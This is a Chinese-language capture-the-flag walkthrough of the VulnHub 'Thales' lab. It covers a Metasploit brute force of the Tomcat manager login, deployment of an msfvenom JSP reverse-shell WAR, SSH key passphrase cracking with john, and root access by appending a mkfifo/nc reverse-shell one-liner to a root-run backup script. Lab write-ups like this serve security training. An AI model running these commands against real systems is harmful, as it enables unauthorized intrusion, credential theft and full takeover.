vulnhub靶场:Thales

发布时间 2023-06-28 15:09:37作者: 我还没有吃饭

靶场地址:泰雷兹: 1 ~ VulnHub

kali:172.88.6.144

靶场:172.88.6.81

 

nmap 172.88.6.0/24

 nmap -T4 -sV -P  -A 172.88.6.81

 

访问http://172.88.6.81:8080/,发现是tomcat页面,登录需要账户,所以使用msf爆破下

 msfconsole

search tomcat

 

 use auxiliary/scanner/http/tomcat_mgr_login

set rhosts 172.88.6.81

run

 

[+] 172.88.6.81:8080 - Login Successful: tomcat:role1

得出账户和密码

 

没有找到相关信息,返回重新登录

 

 

 在应用程序列表中我们可以进行文件上传和服务部署,因此构造一个反弹shell进行部署,生成反弹shell:msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.88.6.144 LPORT=8888 -f war -o shell.war,然后将文件上传到靶场中还要在kali中nc,nc -lvvp 8888,上传成功,访问下文件就好了

 

 

python3 -c 'import pty;pty.spawn("/bin/bash")'

在/home/thales中发现了两个文件,notes.txt中有一个提示,user.txt无权限读取

 .ssh目录下有公私钥

 

在kali中创建文件,把私钥放进去,在/usr/share/john目录中有一个文件ssh2john.py,输入python3 ssh2john.py /root/Thales > /root/password,生成一个密码本

john --wordlist=/usr/share/wordlists/rockyou.txt 爆破文件

john --wordlist=/usr/share/wordlists/rockyou.txt  /root/password

 

 爆破出的密码为:vodka06

 

找到一个:a837c0b5d2a8a07225fd9905f5a0e9c4

 这个back.sh文件具有root权限,所以写入一句话

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.88.6.144 1235 >/tmp/f" >> backup.sh

nc -lvnp 1235,等待一分钟就好了

 

 

 

这个靶场总的来说不算难,也就是破解秘钥和反弹shell